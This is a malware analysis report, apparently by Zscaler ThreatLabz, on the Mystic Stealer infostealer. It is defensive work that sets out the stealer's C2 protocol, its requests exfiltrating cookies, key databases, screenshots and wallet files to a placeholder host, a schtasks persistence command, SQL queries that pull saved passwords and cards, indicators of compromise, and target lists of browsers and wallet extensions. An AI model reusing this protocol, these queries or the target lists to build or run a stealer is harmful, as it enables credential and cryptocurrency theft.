The infected system (bot) starts communication with the C2 server by sending a POST request with data containing a variable named hwid, which includes a Base64 encoded bot ID generated based on information from the victim’s machine. A second variable with the name build contains the botnet ID, a value that is hardcoded in the binary of the malware. Once the C2 receives these initial two packets, the bot is registered.
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="hwid"
BASE64(0123456789ABCDEF123456)
--<boundary>
Content-Disposition: form-data; name="build"
BASE64(botnet_id)
--<boundary>--
The C2 server generates and returns a session token (a 64 byte lowercase hexadecimal string) that will be used in subsequent packets, together with a set of binary flags that indicates which actions should be performed (take a screenshot, steal browser credentials, steal cryptocurrency wallets, etc).
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 07 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
BASE64(OK <token>1|1|1|1|0|1|1|1|0|1|1)
When the bot submits information to the C2 server, it sends a POST request with:
A filename variable containing the name of the file being submitted, Base64 encoded
A file variable with the content of the file, also Base64 encoded
A token variable with the session token from the registration request
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="filename"
BASE64("example.txt")
--<boundary>
Content-Disposition: form-data; name="file"
BASE64(<content of example.txt>)
Content-Disposition: form-data; name="token"
BASE64(<token>)
–<boundary>--
If the request is valid, the server answers with an OK response.
After registration, the bot sends information about the infected system via a file named SystemInformation.txt that contains information similar to the following:
Build mark: zzzz
IP: {ip}
File Location: C:\Users\xxxx\AppData\Local\Temp\aaaa\bbbb.exe
UserName: xxxx
ComputerName: XXXX
Country: {country}
Location: {location}
Zip code: {zipcode}
TimeZone: {timezone}
HWID: 0123456789ABCDEF012345
Current language: English (United States)
ScreenSize: 1792x1120
Operation System: Windows 10 Pro x64
Available KeyboardLayouts:
English (United States)
Hardwares:
CPU: Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz
GPU: VMware SVGA 3D
RAM: 4293898240ll
Information Stealing
Once Mystic Stealer has registered and reported the infected system information, the binary flags from the C2 server determine whether to conduct data theft and load additional malware payloads. Mystic Stealer sends HTTP POST requests for specific target lists by specifying the value in a msg variable.
Browsers
Depending on the configuration, Mystic Stealer will steal data from Chromium-based browsers by first requesting a target list from the C2 server.
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="msg"
BASE64("chromium-browsers")
--<boundary>
Content-Disposition: form-data; name="token"
BASE64(<token>)
--<boundary>--
The Mystic Stealer C2 server will respond with a list of Chromium-based browsers to target. The Appendix section shows the full list of browsers that have been targeted.
Citrio|%localappdata%\CatalinaGroup\Citrio\User
Data|Coowon|%localappdata%\Coowon\Coowon\User
Data|Liebao|%localappdata%\liebao\User
Data|QIP Surf|%localappdata%\QIP Surf\User
Data|Orbitum|%localappdata%\Orbitum\User
Data|Comodo Dragon|%localappdata%\Comodo\Dragon\User
Data|Amigo|%localappdata%\Amigo\User\User
Data|Torch|%localappdata%\Torch\User Data|Yandex
Browser|%localappdata%\Yandex\YandexBrowser\User
Data|Comodo|%localappdata%\Comodo\User
Data|360Browser|%localappdata%\360Browser\Browser\User
Data|Maxthon3|%localappdata%\Maxthon3\User Data|K-Melon|...
Each element of the list contains the name of the browser and the path where the browser’s data is stored:
Browser name 1|Browser path 1|..............|Browser N|Browser path N
Mystic Stealer also retrieves a list of browser extensions to target.
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="msg"
BASE64(extensions)
--<boundary>
Content-Disposition: form-data; name="token"
BASE64(<token>)
--<boundary>--
The Mystic Stealer C2 server will return the browser extensions configuration.
Coinbase Wallet|hnfanknocfeofbddgcijnmhnfnkdnaad|Guarda|hpglfhgfnhbgpjdenjgmdg
oeiappafln|EQUAL Wallet|blnieiiffboillknjnepogjhkgnoapac|Jaxx
Liberty|cjelfplplebdjjenllpjcblmjkfcffne|BitApp
Wallet|fihkakfobkmkjojpchpfgcmhfjnmnfpi|iWallet|kncchdigobghenbbaddoj
jnnaogfppfj|Wombat|amkmjjmmflddogmhpjloimipbofnfjih|MEW
CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|GuildWallet|nanjmdknhkinifnkgdcgg
cfnhdaammmj|Saturn Wallet|nkddgncdjgjfcddamfgcmfnlhccnimig|Ronin
Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|NeoLine|cphhlgmgameodnhkjdmkp
anlelnlohao|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|Liquality
Wallet|kpfopkelmapcoipemfendmdcghnegimn|Terra
Station|aiifbnbfobpmeekipheeijimdpnlpgpp|Keplr|dmkamcknogkgcdfhhbddcg
hachkejeap|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|...
In this case, each element contains the name of the extension and the ID.
Extension name 1|Extension ID 1|....|Extension name N|Extension ID N
Next, the malware downloads the legitimate sqlite3.dll DLL from the C2 server. This library is used to parse web browser SQLite database files.
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="msg"
BASE64("sqlite3")
--<boundary>
Content-Disposition: form-data; name="token"
BASE64(<token>)
--<boundary>--
The response is the sqlite3 DLL Base64 encoded, as shown below:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
BASE64(OK BASE64(<sqlite3 file>))
The stolen browser data (if any) is sent to the C2 server. For example, cookies stolen from Microsoft Edge (which is Chromium-based) would be exfiltrated, as shown below:
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="filename"
BASE64(“Cookies/Microsoft_Edge_Default.txt”)
--<boundary>
Content-Disposition: form-data; name="file"
BASE64(<content of Cookies/Microsoft_Edge_Default.txt>)
Content-Disposition: form-data; name="token"
BASE64(<token>)
–<boundary>--
Depending on the configuration, Mystic Stealer will also retrieve a list gecko-browsers to target.
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="msg"
BASE64("gecko-browsers")
--<boundary>
Content-Disposition: form-data; name="token"
BASE64(<token>)
--<boundary>--
The configuration format is identical to the chromium-browser list.
Firefox|%appdata%\Mozilla\Firefox\Profiles|Comodo
IceDragon|%appdata%\Comodo\IceDragon\Profiles|BlackHawk|%appdata%\NET
GATE
Technologies\BlackHawk\Profiles|Cyber
fox|%appdata%\8pecxstudios\Cyberfox\Profiles|K-Meleon|%appdata%\K-Meleon\Profiles|Icecat|%appdata%\Mo
zilla\icecat\Profiles
Mystic Stealer will collect a number of database files from Firefox-based browsers containing cookies, certificates, keys, etc., as shown below:
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="filename"
BASE64("Gecko/Firefox/<profile>.default/key4.db")
--<boundary>
Content-Disposition: form-data; name="file"
BASE64(<content of Gecko/Firefox/<profile>.default/key4.db>)
Content-Disposition: form-data; name="token"
BASE64(<token>)
–<boundary>--
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
BASE64(OK)
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="filename"
BASE64("Gecko/Firefox/<profile>.default/cert9.db")
--<boundary>
Content-Disposition: form-data; name="file"
BASE64(<content of Gecko/Firefox/<profile>.default/cert9.db>)
Content-Disposition: form-data; name="token"
BASE64(<token>)
–<boundary>--
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
BASE64(OK)
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="filename"
BASE64("Cookies/Firefox_<profile>.default.txt")
--<boundary>
Content-Disposition: form-data; name="file"
BASE64(<content of Cookies/Firefox_<profile>.default.txt>)
Content-Disposition: form-data; name="token"
BASE64(<token>)
–<boundary>--
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
BASE64(OK)
If the browser history configuration flag (position 4) is set to 1, Mystic Stealer also sends the victim’s browsing history.
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="filename"
BASE64("History/Firefox_8qjvd3qg.default-release.txt")
--<boundary>
Content-Disposition: form-data; name="file"
BASE64(<content of History/Firefox_8qjvd3qg.default-release.txt>)
Content-Disposition: form-data; name="token"
BASE64(<token>)
–<boundary>--
The browser history file contains the website title (if available) and the URL as shown below:
Title: <Title1>
Url: <url1>
===============
Title: <Title2>
Url: <url2>
===============
...
===============
Title: <TitleN>
Url: <urlN>
===============
Screenshots
If the screenshot configuration flag (position 8) is set to 1, Mystic Stealer captures and sends a screenshot of the victim’s machine.
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="filename"
BASE64("Screenshot.jpeg")
--<boundary>
Content-Disposition: form-data; name="file"
BASE64(<content of Screenshot.jpeg>)
Content-Disposition: form-data; name="token"
BASE64(<token>)
–<boundary>--
Files
Mystic Stealer also downloads a list of files to be stolen from the victim.
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="msg"
BASE64("files")
--<boundary>
Content-Disposition: form-data; name="token"
BASE64(<token>)
--<boundary>--
The Mystic Stealer C2 server returns a list of target files and directories to steal. For example, ThreatLabz has observed this feature used to steal cryptocurrency wallets as shown below:
Wallets/Jaxx
Desktop|%appdata%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveld
b|*.*|0|Wallets/Atomic|%appdata%\atomic\Local
Storage\leveldb|*.*|0|Wallets/Binance|%appdata%\Binance|app-store.jso
n,simple-storage.json,.finger-print.fp|0|Wallets/Co
inomi|%appdata%\Coinomi\Coinomi\wallets|.wallet,*.config|0|Wallets/Exo
dus|%appdata%\Exodus|exodus.conf.json,window-state.json,passphrase.json,seed.seco,info
.seco|1|Wallets/Bitcoin
Core|%appdata%\Bitcoin\wallets|wallet.dat|1|Wallets/Bitcoin Core
Old|%appdata%\Bitcoin|*wallet*.dat|0|Wallets/Dogecoin|%appdata%\Bitco
in\wallets|*wallet*.dat|0|Wallets/Raven
Core|%appdata%\Raven|*wallet*.dat|0|Wallets/Daedalus
Mainnet|%appdata%\Daedalus Mainnet\wallets|she*.sqlite|0|Wallets/Blockstream
Green|%appdata%\Blockstream\Green\wallets|*.*|1|Wallets/Wasabi
Wallet|%appdata%\WalletWasabi\Client\Wallets|*.json|0|Wallets/Ethereu
m|%appdata%\Ethereum|keystore|0|Wallets/Electrum|%appdata%\Electrum\w
allets|*.*|0|Wallets/ElectrumLTC|%appdata%\Electrum-LTC\wallets|*.*|0
|Wallets/Electron
Cash|%appdata%\ElectronCash\wallets|*.*|0|Wallets/MultiDoge|%appdata%
\MultiDoge|multidoge.wallet|0|Wallets/Jaxx Desktop
Old|%appdata%\jaxx\Local Storage|file__0.localstorage|0
The format for each targeted file is shown below:
Directory name|Location on disk|Target files mask|Flag
The flag parameter indicates whether Mystic Stealer should recursively search the target directory. Once finished, a “done” msg is sent, to indicate the file stealing task is finished.
Loader
A “loader” msg can be sent by Mystic Stealer to the C2 server to request additional second-stage malware payloads, as shown below:
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="msg"
BASE64("loader")
--<boundary>
Content-Disposition: form-data; name="token"
BASE64(<token>)
--<boundary>--
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
BASE64(OK |1|BASE64(exe1)| |1|BASE64(exe2)| ....|1|BASE64(exeN))
The response to the loader request is an initial Base64 encoded layer containing an OK response with a set of one or more Base64 encoded executables:
Figure 3: Base64 encoded executables downloaded by Mystic Stealer
The packet follows this format:
|1|BASE64(exe1)| |1|BASE64(exe2)| ....|1|BASE64(exeN)
The parameter that precedes the Base64 encoded executable does not appear to be currently used, although it may indicate a potential feature that has yet to be implemented such as whether to write the binary to disk or inject it into another process. After downloading and executing these binary payloads, Mystic Stealer sends a final POST request with the message “loadercode”. The C2 server will then return an empty response.
Debug Builds
Zscaler ThreatLabz has found recent samples compiled in September and October 2023, which contain plaintext strings that typically are obfuscated in other samples:
Figure 4: Mystic Stealer debug version plaintext strings
In addition, these samples have string references with full file paths (instead of a relative path like ..\\chromiumbrowsers.cpp in non-debug samples) to the original C++ code. Interestingly, the username in these full paths is will. ThreatLabz suspects these samples are compiled from code that is still in development where they could be testing improvements and new features.
Conclusion
Even though Mystic Stealer is a relatively new information stealing malware, ThreatLabz has observed a significant increase in threat actors leveraging it to deploy additional malware. The developer behind Mystic Stealer is continuously modifying and improving the code, and the malware is quickly evolving. The C2 communication protocol used by Mystic Stealer has switched from a custom binary protocol to an HTTP-based protocol, likely to improve beaconing from infections in corporate environments that leverage firewalls to filter suspicious network traffic. Based on the number of new Mystic Stealer samples and C2 panels, the malware is likely to continue to pose a threat to organizations.
In addition to staying on top of these threats, Zscaler's ThreatLabz team continuously monitors for new threats and shares its findings with the wider community.
Cloud Sandbox
Zscaler’s multilayered cloud security platform detects indicators related to Mystic Stealer at various levels.
Indicators of Compromise (IoCs)
Hash
First Seen
Expiration Date
Botnet ID
C2
6203249bebf7248535ff5ef70a7c5a57
688b399d91ac63c9d73441af6e65f184
2023-10-08 08:36:29 UTC
2023-11-09T20:02:21
15
hxxp://171.22.28[.]235/loghub/master
7eb8617d09f204dd40541a000f98810
19ff103ff330cb0e7aebb8c3a160cfd26
2023-09-29 15:30:00 UTC
2023-10-26T11:48:42
Chung
hxxp://194.87.31[.]123/loghub/master
21a8db193093caf6acbcd14ba64c9
8a1c9f16998cade8f60fa0fb4dc63e33bd2
2023-09-18 21:36:22 UTC
2023-09-22T12:35:08
mema
hxxp://5.42.92[.]211/loghub/master
7003eadaef73ac1f2e0f0a86a3d1f57
92a5dde3a45ba71e095861b55059b3780
2023-09-07 07:53:28 UTC
2023-09-12T20:08:32
tresk
hxxp://5.42.92[.]211/loghub/master
00fe26cfe465740e61b99f105bcf251
6ff49e117f23f4b508d5256c57fa3fc66
2023-06-26 05:51:47 UTC
2023-07-24T18:48:13
sup
hxxp://188.40.116[.]251:8005/loghub/master
Appendix
Decrypted Malware Strings
%08lX%04lX%lu
%ix%i
%ls %ls
%ls [%ls %d] ERROR in %s, line %d, function %s. %s
%ls\\%ls
%ls\\%ls\\Local State
%ls\\*
%ls\\Web Data
%ls\\cookies.sqlite
%ls\\formhistory.sqlite
%ls\\places.sqlite
%s/%s
%userprofile%\\Telegram Desktop\\tdata
&&\" **(# +
&0'fg{199
(ov_(ov
,+& ##*
-t{d2
..*($2nd-2d-2o595
..\\stealer\\chromiumbrowsers.cpp
..\\stealer\\filesgrabber.cpp
..\\stealer\\geckobrowsers.cpp
..\\stealer\\httpclient.cpp
..\\stealer\\loader.cpp
..\\stealer\\sqlite3.cpp
..\\stealer\\stealer.cpp
/c schtasks /create /F /sc minute /mo 15 /tr \"%ls\" /tn \"\\WindowsAppPool\\%ls\"
LeaveCriticalSection
EnterCriticalSection
Advapi32.dll
Autofills/%ls_%ls.txt
Available KeyboardLayouts: Gonna gather system information
Build mark:
CPU:
Can't add task in task scheduleO, COeatePOocessW fails; last eOOoO: %x
Can't obtain RmStartSession's address, maybe windows don't support RestartManager
Can't start process; last error: %x
Can't write file; last error: %x
Card:
Chromium browsers paths were retrieved
ComSpec
Command line: %ls
ComputerName:
Config retrieved: %d, %d, %d, %d, %d, %d, %d, %d, %d, %d
Content-Disposition: form-data; name=\"%s\"
Content-Length: %d
Content-Type: multipart/form-data; boundary=%s
Cookies
Cookies/%ls_%ls.txt
Country: {country}
CreditCards/%ls_%ls.txt
Current language:
Default
Email
Email/Credentials.txt
Email:
EnterCriticalSection
Expand path: %ls
Extensions were retrieved
FALSE
Failed to connect to %s
Failed to download sqlite3.dll
Failed to export functions from sqlite3.dll
Failed to load sqlite3.dll
Failed to retrieve chromium browsers paths
Failed to retrieve files grabber paths
Failed to retrieve gecko browsers paths
File Location:
Files grabber paths were retrieved
FilesGrabber: Sent %ls
Find chromium cookies db %ls
Find chromium extension %ls with id %ls
Find chromium history db %ls
Find chromium login data db %ls
Find chromium web data db %ls
Find gecko autofills db %ls
Find gecko cookies db %ls
Find gecko file %ls
Find gecko history db %ls
Find steam data, path %ls
Gdi32.dll
Gecko browsers were retrieved
Gecko/%ls/%ls/%ls
GetModuleHandleA
Global\\%s%x
Gonna gather system information
Gonna grab ChromiumBrowsers
Gonna grab GeckoBrowsers
Gonna grab files
Gonna grab outlook
Gonna grab steam
Gonna grab telegrab
Gonna take screenshot
GrabFiles
HH':'mm':'ss
HWID:
HandleChromiumBrowsers
HandleGeckoBrowsers
Hardwares:
History/%ls_%ls.txt
Holder:
HttpOpenRequest fails; last error: %x
HttpQueryInfo fails; last error: %x
IMAP Password
IP: {ip}
InitializeCriticalSection
InternetConnect fails; last error: %x
InternetCrackUrl fails; last error: %x
InternetOpen fails; last error: %x
Kernel32.dll
Key:
LeaveCriticalSection
Location: {location}
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Name:
Network\\Cookies
Ntdll.dll
..\\stealer\\geckobrowsers.cpp
Ole32.dll
Operation System:
POP3 Password
Password:
ProductName
Request
Retrieve rule FilesGrabber, server side path: %ls
Rstrtmgr.dll
Rstrtmgr.dllls GetModuleHandleA %sEnterCriticalSections. LeaveCriticalSection
SELECT expiration_month, expiration_year, name_on_card, card_number_encrypted FROM credit_cards
SELECT fieldname, value FROM moz_formhistory
SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
SELECT host_key, is_httponly, path, is_secure, expires_utc, name, encrypted_value FROM cookies
SELECT origin_url, username_value, password_value FROM logins
SELECT title, url FROM moz_places
SELECT url, title FROM urlsFind chromium history db %ls
SMTP Server
ScreenSize:
Screenshot.jpeg
Sent log. Gonna send done message
Sent screenshot
Software\\Microsoft\\Office
Software\\Valve\\Steam
Sq~70
SrartLoader
Start
SteamPath
Successfully connected to %s
Successfully start process
SystemInformation.txt
Telegram
There's file to load. Gonna load it
TimeZone: {timezone}
Title:
Tkernel32.dll
Token retrieved: %s
Trying to connect to %s
URL:
USERPROFILE|tELEGRAMdESKTOP|TDATA
Url:
User32.dll
UserName:
Username:
Value:
Wallets/%ls_%ls_%ls
Wininet.dllCrypt32.dll
Wininet.dllCrypt32.dllGdiplus.dll
Wininet.dllCrypt32.dllGdiplus.dllShlwapi.dllKernel32.dll
Write file content in %ls
Zip code: {zipcode}
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
build
cert8.db
cert9.db
chromium-browsers
computername
encrypted_key
extensions
filename
files
done
files
gecko-browsershi
Sent system information
kernel32.dll
key3.db
key4.db
loader
loghub/master
logins.json
msgtzn
SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion
signons.sqlite
sqlite3
sqlite3_close
sqlite3_column_blob
sqlite3_column_bytes
sqlite3_column_text
sqlite3_open
sqlite3_open_v2
sqlite3_open_v2sqlite3_finalize
sqlite3_prepare_v2
sqlite3_step
token
username
wallets\\
Targeted Chromium Browsers
Citrio|%localappdata%\CatalinaGroup\Citrio\User Data
Coowon|%localappdata%\Coowon\Coowon\User Data
Liebao|%localappdata%\liebao\User Data
QIP Surf|%localappdata%\QIP Surf\User Data
Orbitum|%localappdata%\Orbitum\User Data
Comodo Dragon|%localappdata%\Comodo\Dragon\User Data
Amigo|%localappdata%\Amigo\User\User Data
Torch|%localappdata%\Torch\User Data
Yandex Browser|%localappdata%\Yandex\YandexBrowser\User Data
Comodo|%localappdata%\Comodo\User Data
360Browser|%localappdata%\360Browser\Browser\User Data
Maxthon3|%localappdata%\Maxthon3\User Data
K-Melon|%localappdata%\K-Melon\User Data
Sputnik|%localappdata%\Sputnik\Sputnik\User Data
Nichrome|%localappdata%\Nichrome\User Data
CocCoc|%localappdata%\CocCoc\Browser\User Data
Uran|%localappdata%\Uran\User Data
Chromodo|%localappdata%\Chromodo\User Data
Mail.Ru|%localappdata%\Mail.Ru\Atom\User Data
Brave Browser|%localappdata%\BraveSoftware\Brave-Browser\User Data
Opera|%appdata%\Opera Software\Opera Stable
Google Chrome|%localappdata%\Google\Chrome\User Data
Microsoft Edge|%localappdata%\Microsoft\Edge\User Data
Chromium|%localappdata%\Chromium\User Data
Opera|%localappdata%\Opera Software|ChromePlus
%localappdata%\MapleStudio\ChromePlus\User Data
Irpathium|%localappdata%\Irpathium\User Data
7Star|%localappdata%\7Star\7Star\User Data
CentBrowser|%localappdata%\CentBrowser\User Data
Chedot|%localappdata%\Chedot\User Data
Vivaldi|%localappdata%\Vivaldi\User Data
Kometa|%localappdata%\Kometa\User Data
Elements Browser|%localappdata%\Elements Browser\User Data
Epic Privacy Browser|%localappdata%\Epic Privacy Browser\User Data
Uran|%localappdata%\uCozMedia\Uran\User Data
Sleipnir|%localappdata%\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
Targeted Gecko Browsers
Firefox|%appdata%\Mozilla\Firefox\Profiles
Comodo IceDragon|%appdata%\Comodo\IceDragon\Profiles
BlackHawk|%appdata%\NETGATE Technologies\BlackHawk\Profiles
Cyberfox|%appdata%\8pecxstudios\Cyberfox\Profiles
K-Meleon|%appdata%\K-Meleon\Profiles
Icecat|%appdata%\Mozilla\icecat\Profiles
Targeted Browser Extensions
Coinbase Wallet|hnfanknocfeofbddgcijnmhnfnkdnaad
Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln
EQUAL Wallet|blnieiiffboillknjnepogjhkgnoapac
Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne
BitApp Wallet|fihkakfobkmkjojpchpfgcmhfjnmnfpi
iWallet|kncchdigobghenbbaddojjnnaogfppfj
Wombat|amkmjjmmflddogmhpjloimipbofnfjih
MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm
GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj
Saturn Wallet|nkddgncdjgjfcddamfgcmfnlhccnimig
Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec
NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao
CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk
Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn
Terra Station|aiifbnbfobpmeekipheeijimdpnlpgpp
Keplr|dmkamcknogkgcdfhhbddcghachkejeap
Sollet|fhmfendgdocmcbmfikdcogofphimnkno
Auro Wallet|cnmamaachppnkjgnildpdmkaakejnhae
Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf
ICONex|flpiciilemghbmfalicajoolhkkenfel
Nabox Wallet|nknhiehlklippafakaeklbeglecifhad
KHC|hcflpincpppdclinealmandijcmnkbgn
MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn
TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec
Binance Chain Wallet|fhbohimaelbohpjbbldcngcnapndodjp
Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb
Nifty Walletjbdaocneiiinmjbjlgalhcelgbejmnpath
Math Wallet|afbcbjpbpfadlkmhmclhkeeodmamcflc
Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc
TezBox|mnfifefkajgofkcjkempathiaecocnkjeh
DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik
BitClip|ijmpgkjfkbfhoebgogflfebnmejmfbml
Steem Keychain|lkcjlnjfpbikmcmbachjpdbijejflpcm
Nash Extension|onofpnbbkehpmmoabgpcpmigafmmnjhl
Hycon Lite Client|bcopgchhojmggmffilplmbdicgaihlkp
ZilPay|klnaejjgbibmhlephnhpmaofohgkpgkd
Coin98 Wallet|aeachknmefphepccionboohckonoeemg
Authenticator|bhghoamapcdpbohphigoooaddinpkbai
Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm
Byone|nlgbhdfgdhgbiamfdfmbikcdghpathoadd
OneKey|infeboajgfhgbjpjbeppbkgnabfdkdaf
LeafWallet|cihmoadaighcejopammfbmddcmdekcje
Authy|gaedmjdfmmahhbjefcbgaolhhanlaolb
EOS Authenticator|oeljdldpnmdbchonielpathgobddffflal
GAuth Authenticator|ilgcnhelpchnceeipipijaljkblbcobl
Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk
Ever|cgeeodpfagjceefieflmdfphplkenlfk
KardiaChain|pdadjkfkgcafgbceimcpbkalnfnepbnk
Rabby|acmacodkjbdgmoleebolmdjonilkdbch
Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa
Oxygen|fhilaheimglignddkjgofkcbgekhenbh
Pali|mgffkfbpathihjpoaomajlbgchddlicgpn
XDEFI|hmeobnfnfcmdkdcmlblgagmfpfboieaf
Nami|lpfcbjknijpeeillifnkikgncikgfhdo
MultiversX DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm
Keeper|lpilbniiabackdjcionkobglmddfbcjo
Softlare|bhhhlbepdkbapadjdnnojkbgioiodbic
Govy|jnkelfanjkeadonecabehalmbgpfodjm
SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmepath
Braavos|jnlgamecbpmbajjfhmmmlhejkemejdma
Enkrypt|kkpllkodjelopathieedojogacfhpaihoh
OKX|mcohilncbfahbmgdjkbpemcciiolgcge
HashPack|gjagmgpathdbbciopjhllkdnddhcglnemk
Eternl|kmhcihpebfmpgmihbkipmjlmmioameka
Pontem Aptos|phkbamefinggmakgklpkljjmgibohnba
Martianin|efbglgofoippbgcjepnhiblaibcnclgk
Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj
Leap Terra|aijcbedoijmgnlmjeegjaglmepbmpkpi
